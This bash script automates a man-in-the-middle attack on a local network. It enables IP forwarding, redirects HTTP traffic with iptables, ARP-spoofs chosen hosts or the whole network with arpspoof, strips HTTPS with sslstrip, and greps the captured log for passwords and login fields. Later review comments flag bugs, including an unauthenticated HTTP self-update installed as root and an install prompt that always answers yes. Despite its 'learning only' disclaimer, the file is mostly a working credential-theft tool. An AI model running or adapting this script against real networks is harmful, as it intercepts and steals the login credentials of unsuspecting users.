#!/bin/bash
# Little bash script to launch man it the middle attack and sslstrip.
# version 0.6 by comaX
#
# File layout: option parsing (-h / -u), a banner, an iptables reset, the
# cleanup() exit routine, then the interactive setup (ip_forward, a NAT
# REDIRECT rule, arpspoof, sslstrip) and a "quit" prompt that ends in cleanup().
# Everything here runs as root (it writes /proc/sys and /usr/bin). Every prompt
# answer is expanded unquoted, so empty input or values containing spaces or
# glob characters make individual commands fail; there is no `set -e`, so the
# script keeps going after such failures.
PROGNAME=$(basename $0) # NOTE(review): assigned but never read anywhere below
VERSION="0.6.2" # the banner reports 0.6.2 while the header comment says 0.6
#Let's define some arguments that can be passed to the script :
args= # NOTE(review): never used
while [ $# -ge 1 ] #check parameters
do
  case $1 in
    -h | --help) #define help message
      clear
      echo -e "You are running $0, version $VERSION. usage : $0 [-h | --help] | [-u | --upadte] -h or --help : displays this help message, disclaimer and exit. -u or --update updates and installs this script \033[31m DISCLAIMER :\033[m This program is intended for learning purpose only. I do not condone hacking and wouldn't be held responsible for you actions. Only you would face legal consequences if you used this script for illegal activities. \033[31m What I think should be learnt from this script :\033[m This script should teach you how easy it is to steal sensitive online credential and how to protect you from it, provided you understand what this program does. The best way to understand what it does is to look at its source. This will also teach you very basic shell script programming. \033[31m Changelog :\033[m added in v0.6 -Support for multiple targets added in v0.5 : -Parameters for this great help message and update, more comments. -Minor improvments added in v0.4 : -User friendly case insensitive answers (Y/y) -Option to map network, retrieving live hosts and their dns names -Minor improvments \033[31m Credits :\033[m Credits goes to all people on backtrack forums for their help and support, and google for being my best friend with scripting. Please criticize this program or submit ideas on the official thread at http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
      exit
      ;;
    -u | --update) #update program
      # Self-update: fetches a script over plain http with no checksum or
      # signature check and installs it to /usr/bin, so whoever can tamper with
      # that connection or its DNS answer controls what gets installed as root.
      # From a monitoring standpoint, an unauthenticated HTTP download followed
      # by a write to /usr/bin is the pattern worth alerting on. The temp path
      # /tmp/mitm_update.sh is fixed and predictable rather than mktemp'd.
      echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? 
(Y/N)"
      read -e proceed
      if [[ $proceed = "y" || $proceed = "Y" ]] ; then
        # wget's exit status is not checked: with -O the file is created even
        # when the download fails, and the (possibly empty) file is still
        # copied over /usr/bin/mitm below.
        wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
        cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
        rm /tmp/mitm_update.sh #delete temp file
        echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
        sleep 3
        chmod +x /usr/bin/mitm #make newly installed script executable
        /usr/bin/mitm #launch new script
        # NOTE(review): there is no `exit` after the new copy returns, so this
        # (old) script resumes with the remaining arguments afterwards.
      else
        # `&` backgrounds the echo instead of sequencing it before sleep;
        # `;` is presumably what was intended (same on the `*)` arm below).
        echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2
      fi
      ;;
    *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
  esac
  shift
done
clear
echo -e "=========================================================================== =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m = = Feel free to contribute, and distribute this script as you please. = = Official thread : http://tiny.cc/mitmautomate = = Check out the help (-h) to see new features and informations = = You are running version $VERSION. = ==========================================================================="
echo
echo
# Starting fresh : reset ip forward and iptables
# NOTE(review): this flushes and deletes every chain on the host, including any
# pre-existing firewall policy, not only rules this script added.
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "[-] Cleaned."
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Defining exit function and other ending features
#######################################
# cleanup: stop sslstrip and arpspoof, reset ip_forward and iptables, show the
# sslstrip log, ask whether to keep it, offer to install the script, then exit.
# Globals:   sslstripid (read), filename (read)
# Arguments: none
# Outputs:   prompts and results on stdout
# Returns:   never returns; exits 1 when /usr/bin/mitm already exists, else 0
#######################################
cleanup() {
  echo
  echo "[+] Killing processes and resetting iptable."
  # sslstripid is only set once sslstrip has been started; when cleanup() is
  # reached from the "invalid choice" branch below it is empty and this kill
  # only prints a usage error.
  kill ${sslstripid}
  killall arpspoof # kills every arpspoof process on the host, not just ours
  echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
  iptables --flush # there are probably too many resets here,
  iptables --table nat --flush # but at least we're sure everything's clean
  iptables --delete-chain
  iptables --table nat --delete-chain
  echo "[+] Clean up successful..."
  echo -e "\033[31m [+] Let's have a look at sniffed passwords... 
\033[m" #Displaying results
  echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
  # The log is a plaintext file under a user-chosen, predictable name in the
  # world-readable /tmp; $filename is unquoted here and in mv/rm below.
  egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
  echo
  echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
  echo "If you want to keep it, it will be stored in /root/$filename.txt"
  read -e keep
  if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
    mv /tmp/$filename.txt /root/$filename.txt #moving file
    if [ -f "/root/$filename.txt" ]; then #check if it exists
      echo "Log file copied !" #it does
    else
      echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
    fi
  else
    rm /tmp/$filename.txt #removing temp file
    echo "All logs deleted"
  fi
  if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
    echo
    echo
    exit 1 #if yes, exit. NOTE(review): non-zero status on the normal path
  else
    echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
    read -e install
    # BUG: `$install="y"` has no spaces around `=`, so it is one non-empty word
    # and the test is always true -- answering N still installs the script.
    # The intended form is `$install = "y"`, matching the other prompts.
    # The copy also assumes the script is run as ./mitm.sh from its own dir.
    if [[ $install = "Y" || $install="y" ]] ; then
      cp ./mitm.sh /usr/bin/mitm #copy and rename script
      echo -e "\033[32m Script installed !\033[m"
    else
      echo "Script not installed."
    fi
  fi
  exit
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating ip forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
echo
read -e outport
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? 
(generally 80)"
echo
read -e inport
echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
# Neither port is validated; an empty or non-numeric answer makes iptables
# reject the rule, and "[-] Traffic rerouted" is printed regardless.
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Arpspoofing
echo
echo -e "\033[31m [+] Activating arpspoofing... \033[m"
echo
ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
echo
echo "Enter gateway ip adress (as shown above) :"
read -e gateway
echo
echo "What interface would you like to use ? (it should match gateway ip as shown above)"
read -e iface
echo
echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
read -e choicearp
echo
if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
  echo
  echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]"
  read -e hosts
  echo -e "\033[31m "
  if [[ $hosts = "Y" || $hosts = "y" ]] ; then
    # Hard-codes a /24 around the gateway address; /tmp/hosts.txt is again a
    # fixed path rather than a mktemp file.
    fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
    grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
    rm /tmp/hosts.txt # remove temporary file
    echo -e "\033[m " # switch color back to white
  else
    echo -e "\033[m "
  fi
  echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. 
If that was the case, then use whole network tageting.\033[m "
  #######################################
  # arpspoofi: start one arpspoof xterm per positional argument (up to 6) and
  # publish the arguments as t1..t6 for the status line printed by the caller.
  # Globals:   iface, gateway (read); t1..t6 (written)
  # Arguments: $1..$6 - target addresses; $1 is used unconditionally
  # Outputs:   a blank line for each absent slot $2..$6
  # Returns:   status of the last command
  #######################################
  # NOTE(review): `[[ "$n" > "0" ]]` is a lexicographic string comparison used
  # as a "slot present" check; it is not an IP-address validation. Targets are
  # never quoted or validated before being handed to the xterm command line.
  arpspoofi() {
    xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null &
    sleep 2
    if [[ "$2" > "0" ]] ; then
      xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null &
      sleep 2
    else
      echo
    fi
    if [[ "$3" > "0" ]] ; then
      xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null &
      sleep 2
    else
      echo
    fi
    if [[ "$4" > "0" ]] ; then
      xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null &
      sleep 2
    else
      echo
    fi
    if [[ "$5" > "0" ]] ; then
      xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null &
      sleep 2
    else
      echo
    fi
    if [[ "$6" > "0" ]] ; then
      xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null &
      sleep 2
    else
      echo
    fi
    # Exported to the caller's scope only because the status line below reads
    # them; a seventh or later argument is silently ignored.
    t1=$1
    t2=$2
    t3=$3
    t4=$4
    t5=$5
    t6=$6
  }
  echo "Enter ip adresses"
  read -e parameters
  arpspoofi $parameters # unquoted on purpose: word-splitting turns the line into separate arguments
  echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
  echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
  xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
  arpspoofid=$! # NOTE(review): recorded but never used; cleanup() relies on killall instead
  sleep 2
  echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
  echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
else
  echo "Your choice is invalid. Quitting."
  cleanup # reached before sslstripid and filename exist, so cleanup()'s kill/egrep/mv fail
fi
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output :"
read -e filename
# $filename is interpolated unquoted into a /tmp path; the log file is created
# at a predictable location and later read by cleanup().
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
echo
echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ? 
echo
echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
echo
echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
echo
# Four chances to type "quit"; every path ends in cleanup(). `$quitting` is
# unquoted inside `[ ]`, so an empty answer produces a "[: =: unary operator
# expected" error and falls through to the next prompt.
read quitting
if [ $quitting = "quit" ] ; then
  cleanup
else
  echo "Bad choice. Enter quit to stop attack"
  read -e quitting
  if [ $quitting = "quit" ] ; then
    cleanup
  else
    echo "Bad choice. Enter quit to stop attack"
    read -e quitting
    if [ $quitting = "quit" ] ; then
      cleanup
    else
      echo "Bad choice. Enter quit to stop attack"
      read -e quitting
      if [ $quitting = "quit" ] ; then
        cleanup
      else
        echo "Bad choice. Enter quit to stop attack"
        echo
        echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
        cleanup
      fi
    fi
  fi
fi